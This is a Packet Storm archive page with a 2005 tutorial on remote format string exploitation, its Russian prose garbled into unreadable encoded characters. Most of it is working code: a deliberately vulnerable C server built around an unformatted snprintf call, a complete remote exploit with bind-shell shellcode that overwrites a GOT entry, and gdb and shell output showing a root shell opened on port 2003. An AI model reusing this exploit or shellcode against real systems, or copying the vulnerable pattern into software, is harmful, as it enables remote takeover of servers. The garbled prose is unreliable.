exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

FORMAT.TXT

FORMAT.TXT
Posted Nov 2, 2005
Authored by unl0ck, Darkeagle | Site exploiterz.org

Remote format string vulnerabilities.

tags | remote, vulnerability
SHA-256 | 036f8350598c5dfc18a4d702c6e394323c1755a75f0ec682b891038df7f13ae7

FORMAT.TXT

Change Mirror Download
Remote Format String Vulnerability.

Ìíîãî óæå ñòàòåé íàïèñàíî íà òåìó îïèñàíèÿ òåõíèê ôîðìàòèðîâàíèÿ ñòðîê.
Íî ìåíÿ ïîðàæàåò òî, ÷òî â íèõ â êà÷åñòâå ïðèìåðîâ àâòîðû ïîêàçûâàþò
ëîêàëüíûå óÿçâèìîñòè è ýêñïëîèòû ê íèì. Â äàííîé æå ñòàòüå ÿ íå áóäó
îïèñûâàòü òåõíèêó äàííîé îøèáêè. ß ïîñòàðàþñü ïîêàçàòü âàì ïðèìåð
íàïèñàíèÿ óÿçâèìîãî ñåðâåðà. Òàê æå ÿ ïîêàæó ïðèìåð óäàëåííîãî ýêñïëîèòà ê íåìó.
Äëÿ ïîíèìàíèÿ âñåãî îïèñàííîãî íèæå íóæíû õîòÿáû íà÷àëüíûå çíàíèÿ òåõíèêè
ôîðìàòèðîâàíèÿ ñòðîêè, ÿçûêà Ñè (ïðãðàììèðîâàíèÿ ñîêåòîâ â ÷àñòíîñòè).

Èòàê, äóìàþ ïîðà ïðèñòóïèòü...

Âîîáùå îøèáêà ôîðìàòèðîâàíèÿ ñòðîêè ñòàëà èçâåñòíà åùå â äàëåêîì 1999 ãîäó.
Íî â òîì æå ãîäó íà íåå îñîáî íèêòî íå îáðàòèë âíèìàíèÿ... Âñå ñ÷èòàëè, ÷òî
äàííàÿ óÿçâèìîñòü íå ïîäëåæèò ýêñïëóàòèðîâàíèþ è èñïîëíåíèþ êîäà. Íî ñïóñòÿ
ãîä, ïðàêòèêà ïîêàçàëà ñâîå. Áûëî íàïèñàíî ìíîæåñòâî ýêñïëîèòîâ íà áàçå
ôîðìàòèðîâàíèÿ ñòðîêè. Îøèáêè îáíàðóæèâàëèñü êàê â áîëüøèõ ïîïóëÿðíûõ
ñåðâåðíûõ ïðèëîæåíèÿõ, òàê è â ïðîñòåíüêèõ óòèëèòàõ. Ïðèìåðîì òîìó ìîæåò
ñëóæèòü ìîùíûé ýêñïëîèò äëÿ wu-ftpd...
Ïî ñóòè, ñåé÷àñ äàæå âñòðå÷àþòñÿ ãëóïûå îøèáêè ïðîãðàììèñòîâ â ïîïóëÿðíûõ
ñåðâåðíûõ ïðèëîæåíèÿõ. Íàïðèìåð, îáíàðóæåííûå ìíîé ãëóïûå îøèáêè â openftpd
èëè qwik-smtpd.

Íó äîâîëüíî ñëîâ... Ïîðà ïðèñòóïèòü ê äåëó.  êà÷åñòâå óÿçâèìîãî ñåðâåðà
ÿ âçÿë ïðèìåð, íàïèñàííûé ìíîé äëÿ ñòàòüè "Ïåðåïîëíåíèå áóôåðà äëÿ ÷àéíèêîâ".
ß åãî íåìíîãî ïîäêîððåêòèðîâàë äëÿ òîãî, ÷òîáû ìû ñìîãëè åãî ïðîýêñïëóàòèðîâàòü
íà áàçå îøèáêè format string.

Âîò êàê îí âûãëÿäèò ñåé÷àñ:

[====================================Server.c=====================================]

#include <stdio.h>
#include <netdb.h>
#include <netinet/in.h>

#define BUFFER_SIZE 2048
#define NAME_SIZE 2048

int handling_client(int c)
{
char buffer[BUFFER_SIZE], name[NAME_SIZE];

memset(name, 0x00, 2048);
memset(buffer, 0x00, 2048);

read(c, name, sizeof(name), 0);
snprintf(buffer, 2048, name);
send(c, buffer, strlen(buffer), 0);
return 0;
}

int main(int argc, char *argv[]) {

int Sock, con, client_size;
struct sockaddr_in srv, cli;

if (argc != 2) {
fprintf(stderr, "usage: %s port\n", argv[0]);
return 1;
}

Sock = socket(AF_INET, SOCK_STREAM, 0);

srv.sin_addr.s_addr = INADDR_ANY;
srv.sin_port = htons( (unsigned short int) atol(argv[1]));
srv.sin_family = AF_INET;

bind(Sock, &srv, sizeof(srv));

listen(Sock, 3);

for(;;) {
con = accept(Sock, &cli, &client_size);
if (handling_client(con) == -1)
fprintf(stderr, "%s: handling() failed", argv[0]);
close(con);
}
return 0;
}

[====================================Server.c=====================================]


Åñëè ïðèãëÿäåòñÿ â êîä ñåðâåðà ïîâíèìàòåëüíåå ìîæíî óâèäåòü è ñàìó óÿçâèìîñòü.
Îíà êðîåòñÿ â ñòðîêå

snprintf(buffer, 2048, name);

 äàííîé ñòðî÷êå ìû ñ ïîìîùüþ ôóíêöèè snprintf() êîïèðóåì â "buffer" ðàçìåðîì
2048 áàéò ñòðîêó, êîòîðóþ ââåë ïîëüçîâàòåëü.
Êàê ðàç â äàííîé ôóíêöèè è çàêëþ÷àåòñÿ îøèáêà. Ìû êîïèðóåì ñòðîêó áåç óêàçàíèÿ
ôîðìàòà åå âûâîäà.
 ñïåöèôèêàöèè ôîðìàò ìîæåò áûòü ëþáîé èç íèæåïåðå÷èñëåííûõ:

%s - âûâîä ñòðîêè
%x - âûâîä ñòðîêè â hex ôîðìàòå
%d - âûâîä ñòðîêè â dec ôîðìàòå
%c - âûâîä ñòðîêè ïîñèìâîëüíî

Òåïåðü äàâàéòå îòêîìïèëèðóåì ñåðâåð è çàïóñòèì åãî.

[root@localhost Format]# gcc srv.c -o srv
srv.c: In function `main':
srv.c:36: warning: passing arg 2 of `bind' from incompatible pointer type
srv.c:41: warning: passing arg 2 of `accept' from incompatible pointer type
[root@localhost Format]# ./srv
usage: ./srv port
[root@localhost Format]# ./srv 5555

Èòàê, ñåðâåð ïðèñòóïèë ê ðàáîòå.
Ïîïðîáóåì ê íåìó ïîäêëþ÷èòüñÿ...

[root@localhost root]# telnet localhost 5555
Trying 127.0.0.1...
Connected to localhost.localdomain (127.0.0.1).
Escape character is '^]'.
TESTING....
TESTING....
Connection closed by foreign host.
[root@localhost root]#

Êàê âèäíî, ñåðâåð âûâîäèò íà ýêðàí êëèåíòó ââåäåííóþ èì ñòðîêó...
Âðîäå áû íè÷åãî ñòðàííîãî...
Íî äàâàéòå ïîïðîáóåì ïî äðóãîìó...

[root@localhost root]# telnet localhost 5555
Trying 127.0.0.1...
Connected to localhost.localdomain (127.0.0.1).
Escape character is '^]'.
AAAA.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x
AAAA.0.41414141.2e78252e.252e7825.78252e78.2e78252e.252e7825.
78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.a0d.0
Connection closed by foreign host.
[root@localhost root]#

Îïà! Âîò è îøèáêà... Ìû ïðî÷èòàëè ñîäåðæèìîå ñòåêà. Êàê âèäíî ñìåùåíèå ðàâíî
äâóì. Ýòî ïîäòâåðæäàåò ñëåäóþùåå...

[root@localhost root]# telnet localhost 5555
Trying 127.0.0.1...
Connected to localhost.localdomain (127.0.0.1).
Escape character is '^]'.
AAAA%2$x
AAAA41414141
Connection closed by foreign host.
[root@localhost root]#

Òàê... Ñìåùåíèå ìû óçíàëè...
Òåïåðü äàâàéòå óçíàåì àäðåñ íàøèõ ôóíêöèé, èñïîëüçóåìûõ â íàøåì ñåðâåðíîì ïðèëîæåíèè.
ß äóìàþ âû çíàåòå, ÷òî â ELF-ôîðìàòå àäðåñà ôóíêöèé ðàñïîëîæåíû â òàáëèöå
GOT (Global Offset Table). Òàê âîò, äëÿ òîãî ÷òîáû óçíàéòü àäðåñ êàêîé-ëèáî
ôóíêöèè â áèíàðíèêå, íóæíî âûïîëíèòü ñëåäóþùåå:

[root@localhost Format]# objdump -R ./srv

./srv: file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET TYPE VALUE
08049a30 R_386_GLOB_DAT __gmon_start__
08049a34 R_386_COPY stderr
080499f8 R_386_JUMP_SLOT atol
080499fc R_386_JUMP_SLOT close
08049a00 R_386_JUMP_SLOT fprintf
08049a04 R_386_JUMP_SLOT accept
08049a08 R_386_JUMP_SLOT listen
08049a0c R_386_JUMP_SLOT strlen
08049a10 R_386_JUMP_SLOT __libc_start_main
08049a14 R_386_JUMP_SLOT bind
08049a18 R_386_JUMP_SLOT snprintf
08049a1c R_386_JUMP_SLOT send
08049a20 R_386_JUMP_SLOT htons
08049a24 R_386_JUMP_SLOT memset
08049a28 R_386_JUMP_SLOT socket
08049a2c R_386_JUMP_SLOT read

[root@localhost Format]#

Òàê âîò, ñëåâà àäðåñà ôóíêöèé, êîòîðûå ðàñïîëîæåííû ñïðàâà.
 ñòàòüÿõ, îïèñûâàþùèõ òåõíèêó ýêñïëîèòèíãà format string, ïðèâîäÿòñÿ
ïðèìåðû ëîêàëüíûõ ýêñïëîèòîâ. Òàì îíè â êà÷åñòâå ïåðåçàïèñûâàþùåãîñÿ àäðåñà
èñïîëüçóþò äåêîíñòðóêòîð èëè ôóíêöèþ exit(0);  íàøåì æå ñëó÷àå ìû íå áóäåì
èñïîëüçîâàòü äåêîíñòðóêòîð, ò.ê. îí çäåñü íåàêòóàëåí. Åñëè ìû â êà÷åñòâå àäðåñà
äëÿ ïåðåçàïèñè âîçüìåì àäðåñ äåêîíñòðóêòîðà, òî êîä áóäåò âûïîëíåí òîëüêî ïîñëå
çàâåðøåíèÿ ðàáîòû ñåðâåðà. Íàì ýòîãî íå íóæíî.  êà÷åñòâå àäðåñà ïðåäëàãàþ âçÿòü
àäðåñ ôóíêöèè snprintf(). Ïî÷åìó? Äà ïîòîìó ÷òî, êîãäà ìû ïîøëåì íàøó ñòðîêó ñåðâåðó,
ñåðâåð ñíà÷àëà âûïîëíèò êîïèðîâàíèÿ ââåäåíûõ íàìè äàííûõ, à çàòåì òîëüêî ïîøëåò íà
òåðìèíàë ýòè æå äàííûå. Ïîýòîìó ïðè êîïèðîâàíèè ìû ïåðåçàïèñûâàåì àäðåñ ôóíêöèè
snprintf() íà àäðåñ êîäà, êîòîðûé ëåæèò â ñòåêå, è øåëëêîä èñïîëíÿåòñÿ ñ ïðàâàìè
ïîëüçîâàòåëÿ, êîòîðûé çàïóñòèë óÿçâèìûé ñåðâåð.

Èòàê, äîâîëüíî ñëîâ... Ïðèñòóïàåì ê äåëó...

×òî ìû èìååì? À èìååì ìû ñëåäóþùåå: ìû çíàåì ñìåùåíèå ( îíî ðàâíî äâóì ) è çíàåì
àäðåñ ôóíêöèè snprintf() ( îí ðàâåí 0x08049a18 ). Îñòàëîñü óçíàòü òîëüêî àäðåñ
íàøåãî êîäà â ñòåêå...
Åãî ìû óçíàåì äàëåå....
Íàø óäàëåííûé ýêñïëîèò äîëæåí âûïîëíÿòü ñëåäóþùåå...
Îí äîëæåí ñîåäèíÿòüñÿ ñ ñåðâåðîì. Äàëåå ôîðìèðîâàòü ñïåöèàëüíóþ ñòðîêó äëÿ
ïîñûëêè ñåðâåðó, à ïîòîì òîëüêî îòïðàâëÿòü åå.  ñëó÷àå óäà÷íîãî ýêñïëóàòèðîâàíèÿ
ìû ïîëó÷èì óäàëåííûé root øåëë íà îïðåäåëåííîì ïîðòó. Èòàê, äàâàéòå âñå ýòî ðåàëèçóåì
è íàïèøåì ýêñïëîèò.

Âîò êàê âûãëÿäèò ýêñïëîèò, íàïèñàííûé ìíîé:

[====================================Exploit.c=====================================]

#include <stdio.h>
#include <netdb.h>
#include <netinet/in.h>

#define offset 2 // íàøå ñìåùåíèå
#define var 0x08049a18 // àäðåñ ôóíêöèè snprintf()

static char shellcode[]= // Bind 2003 PORT
"\x31\xc0\x89\xc3\xb0\x02\xcd\x80\x38\xc3\x74\x05\x8d\x43\x01\xcd\x80"
"\x31\xc0\x89\x45\x10\x40\x89\xc3\x89\x45\x0c\x40\x89\x45\x08\x8d\x4d"
"\x08\xb0\x66\xcd\x80\x89\x45\x08\x43\x66\x89\x5d\x14\x66\xc7\x45\x16"
"\x07\xd3\x31\xd2\x89\x55\x18\x8d\x55\x14\x89\x55\x0c\xc6\x45\x10\x10"
"\xb0\x66\xcd\x80\x40\x89\x45\x0c\x43\x43\xb0\x66\xcd\x80\x43\x89\x45"
"\x0c\x89\x45\x10\xb0\x66\xcd\x80\x89\xc3\x31\xc9\xb0\x3f\xcd\x80\x41"
"\x80\xf9\x03\x75\xf6\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
"\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";

int main(int argc, char *argv[])
{
int port;
char *ip_address;

char *addr[3] = { ((char *)var +2),
((char *)var),
};

char buffer[1000];
int high, low;
long target = 0x41424344; // pre-address

int Socket;
struct sockaddr_in Addr;

if ( argc < 3 )
{
printf("Remote Format String Vulnerability Exploit by Dark Eagle\n\nusage: %s <ipaddress> <port>\n\n", argv[0]);
exit(0);
}

ip_address = argv[1];
port = atoi(argv[2]);

Addr.sin_family = AF_INET;
Addr.sin_port = htons(port);
Addr.sin_addr.s_addr = inet_addr(ip_address);

Socket = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);

connect(Socket, (struct sockaddr*)&Addr, sizeof(Addr));

printf("[~] preparing sploit data...\n");

high = (target & 0xffff0000) >> 16;
low = (target & 0x0000ffff);

high -= 0x8;

sprintf(buffer, "%s%%.%dx%%%d$hn%%.%dx%%%d$hn", &addr, high, offset, (low - high)-0x8, offset+1);
memset(buffer+strlen(buffer), 0x41, 32);
sprintf(buffer+strlen(buffer), "%s\r\n", shellcode);
printf("[+] done...\n[~] sending sploit data\n");

send(Socket, buffer, strlen(buffer), 1);

printf("[+] done!\n\nNow try to connect %s:2003\n\n", ip_address);
close(Socket);
}

[====================================Exploit.c=====================================]

Êàê ìîæíî âèäåòü èç êîäà.  êà÷åñòâå àäðåñà íà øåëëêîä ÿ èñïîëüçîâàë 0x41424344.
Ïîýòîìó êîä íå èñïîëíèòñÿ. ß ýòî ñäåëàë ñïåöèàëüíî äëÿ òîãî, ÷òîáû ïîêàçàòü âàì
ïðèìåð íàõîæäåíèÿ ïðàâèëüíîãî àäðåñà íà íàø øåëëêîä.

Èòàê, äàâàéòå îòêîìïèëèðóåì ýêñïëîèò è ïîïðîáóåì çàïóñòèòü. Ïîñëå çàïóñêà â êîðíå
ñåðâåðà äîëæåí îáðàçîâàòüñÿ coredump è ñåðâåð äîëæåí "óïàñòü".

[root@localhost Format]# gcc exploit.c -o exploit
[root@localhost Format]# ./exploit 127.0.0.1 31337
[~] preparing sploit data...
[+] done...
[~] sending sploit data
[+] done!

Now try to connect 127.0.0.1:2003

[root@localhost Format]#

Èòàê, âçãëÿíåì íà îêíî ñåðâåðà...

[root@localhost Format]# ./srv 31337
Segmentation fault (core dumped)
[root@localhost Format]# ls
article.txt core.3110 exploit* exploit.c* srv* srv.c
[root@localhost Format]#

Îïà! Âèäèì ñåðâåð ðóõíóë. È â äèðåêòîðèè ñîçäàí "îò÷åò".
Ïðîñìîòðèì åãî.

[root@localhost Format]# gdb src -core core.3110
GNU gdb 6.0-2mdk (Mandrake Linux)
<skiped>
Core was generated by `./srv 31337'.
Program terminated with signal 11, Segmentation fault.
#0 0x41424344 in ?? ()
(gdb)

×òî è ñëåäîâàëî îæèäàòü. Íàø ñåðâåð îáðàòèëñÿ ïî àäðåñó 0x41424344, íî òàì
íè÷åãî íåò...
Òåïåðü äàâàéòå íàéäåì ïðàâèëüíûé àäðåñ íà íàø øåëëêîä.

(gdb) x/100x $esp
0xbfffe72c: 0x0804869b 0xbfffef40 0x00000800 0xbfffe740
0xbfffe73c: 0x00000000 0x08049a1a 0x08049a18 0x36312e25
0xbfffe74c: 0x78383936 0x68243225 0x352e256e 0x25783431
0xbfffe75c: 0x6e682433 0x41414141 0x41414141 0x41414141
0xbfffe76c: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffe77c: 0x41414141 0x89c03102 0xcd02b0c3 0x74c33880
0xbfffe78c: 0x01438d05 0xc03180cd 0x40104589 0x4589c389
0xbfffe79c: 0x4589400c 0x084d8d08 0x80cd66b0 0x43084589
0xbfffe7ac: 0x145d8966 0x1645c766 0xd231d307 0x8d185589
0xbfffe7bc: 0x55891455 0x1045c60c 0xcd66b010 0x45894080
0xbfffe7cc: 0xb043430c 0x4380cd66 0x890c4589 0x66b01045
0xbfffe7dc: 0xc38980cd 0x3fb0c931 0x804180cd 0xf67503f9
0xbfffe7ec: 0x6852d231 0x68732f6e 0x622f2f68 0x52e38969
0xbfffe7fc: 0xb0e18953 0x0d80cd0b 0x00000000 0x00000000
<skiped>
(gdb)

Ìîæíî óâèäåòü, ÷òî øåëëêîä ðàñïîëîæåí ïî àäðåñó "0xbfffe77c". Ïîïðîáóåì åãî
ïîäñòàâèòü âìåñòî 0x41424344.

long target = 0xbfffe77c; /// address of our evil c0d3 :)

Ïåðåêîìïèëèðóåì è çàïóñòèì.

[root@localhost Format]# gcc exploit.c -o exploit
[root@localhost Format]# ./exploit 127.0.0.1 7777
[~] preparing sploit data...
[+] done...
[~] sending sploit data
[+] done!

Now try to connect 127.0.0.1:2003

Òåïåðü ïîïðîáóåì ñîåäèíèòñÿ ñ 2003 ïîðòîì.

[root@localhost Format]# telnet localhost 2003
Trying 127.0.0.1...
Connected to localhost.localdomain (127.0.0.1).
Escape character is '^]'.
uname -a
Linux localhost 2.6.3-7mdk #1 Wed Mar 17 15:56:42 CET 2004 i686 unknown unknown GNU/Linux


Âîò è âñå. Ýêñïëîèò ñðàáîòàë óñïåøíî è â èòîãå ìû ïîëó÷èëè øåëë íà 2003 ïîðòó.

Òåïåðü õîòåëîñü áû íåìíîãî ðàññêàçàòü î ïåðåáîðàõ ñìåùåíèÿ è àäðåñîâ âîçâðàòà íà êîä.
Ñî ñìåùåíèåì âñå âðîäå áû ÿñíî.
Àëãîðèòì ïðîñò äî áåçîáðàçèÿ...
Îí ïðèìåðíî òàêîâ:

Ñîåäèíÿåìñÿ ñ ñåðâåðîì ïîñûëàåì ñòðîêó âèäà AAAA%y$x (ãäå y çíà÷åíèå óâåëè÷èâàþùååñÿ
â öèêëå íà åäèíèöó). Äàëåå àíàëèçèðóåì îòâåò ñåðâåðà. Åñëè îí ðàâåí "AAAA41414141",
òî ñìåùåíèå ïîäîáðàíî, åñëè íåò, òî ïðîäîëæàåì ïåðåáîð.
Íî ñêàæó, ÷òî äàííûé àëãîðèòì ïîäõîäèò äëÿ óÿçâèìûõ ñåðâåðîâ, êîòîðûå âîçâðàùàþò îòâåò.
Íàïðèìåð âèäà FTP ñåðâåðà ("331 Now enter password for 'AAAA41414141'"). Çäåñü âñå
ïðîñòî. Íî åñëè æå ñåðâåð çàïèñûâàåò äàííûå â êàêîé-íèáóäü ëîã, òî òóò óæå ïðèäåòñÿ
àíàëèçèðîâàòü âðó÷íóþ. Íî îïÿòü æå ìîæíî íàïèñàòü ïðîãðàììó, êîòîðàÿ ïîñûëàåò ñåðâåðó
ñòðîêó, äàëåå îòêðûâàåò ëîã è àíàëèçèðóåò äàííûå ñåðâåðà, çàïèñàííûå òóäà.

Òåïåðü ïåðåõîäèì ê ïîäáîðó àäðåñà âîçâðàòà íà íàø êîä â ñòåêå.
Çäåñü âñå îáñòîèò ïî-äðóãîìó, íåæåëè ñî ñìåùåíèåì. Âîîáùå óäàëåííûé ïåðåáîð àäðåñîâ
ìîæíî ïðèìåíÿòü òîëüêî ê ìíîãîïîòî÷íûì ñåðâåðàì.  êîòîðûõ êàæäîìó ïîäêëþ÷èâøåìóñÿ
êëèåíòó âûäåëÿåòñÿ îòäåëüíûé ïîòîì, íåçàâèñÿùèé îò ãëàâíîãî ñåðâåðà.  òàêèõ ñëó÷àÿõ
ïðè ïîñûëêå ñïåö. ñòðîêè, êîòîðàÿ ìîæåò ïðèâåñòè ê êðàõó ñåðâåðà, ãëàâíûé ñåðâåð íå
ïàäàåò, à ïàäàåò äî÷åðíèé ïîòîê ñåðâåðà.  äàííîì ñëó÷àå ìîæíî ïåðåáèðàòü àäðåñ
ñïîêîéíî.

Àëãîðèòì ìîæåò áûòü ñëåäóþùèé:

Ìû çíàåì, ÷òî àäðåñà ôóíêöèé â Linux èìåþò âèä 0xbfffxxxx. Òî åñòü ìîæíî òàêèì
ñïîñîáî çàïóñòèòü öèêë, â êîòîðîì áóäóò ïåðåáèðàòüñÿ àäðåñà.

Ïðèìåðíûé öèêë òàêîâ:

int ret, i;
for ( i = 1; i <= 0xffff; i+=4 )
{
ret = 0xbfff0000+i;
<some functions...>
}

Ò.å. ïîñëå ñîåäèíåíèÿ ñ ìíîãîïîòî÷íûì ñåðâåðîì íà÷èíàåì ïåðåáîð.

Ñîåäèíèëèñü
| |
| ïîñëàëè ñòðîêó
| |
| ïðîâåðèëè ïîëó÷èëè ëè ìû øåëë íà êàêîì-ëèáî ïîðòó
| |
| |-- åñëè øåëë åñòü öèêë ïåðåðûâàåòñÿ...
| |
<--------åñëè íåò---------------------------

Âîò òàêàÿ âîò çàìóäðåííàÿ ñõåìà.

Íà ýòîì ñìåþ îòêëîíèòüñÿ è ïîæåëàòü âàì âñÿ÷åñêèõ óäà÷. ×èòàéòå BugTraq, ïèøèòå
ýêñïëîèòû, ïðàêòèêóéòåñü. Êàê ãîâîðèòñÿ: "Âñå ïðèõîäèò ñ îïûòîì".

Íàïîñëåäîê ïðèâåäó íåêîëüíî õîðîøèõ äîêóìåíòàöèé.

[1] Exploiting Format String Vulnerabilities by scut/team teso '01.
[2] Format String Bugs by rave/rosiello security '04
[3] Advances in format string exploiting by gera & riq '02

Âîò âïðèíöèïå è âñå...
Ïî âñåì âîïðîñàì ïèøèòå íà ôîðóì https://unl0ck.void.ru/forum
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close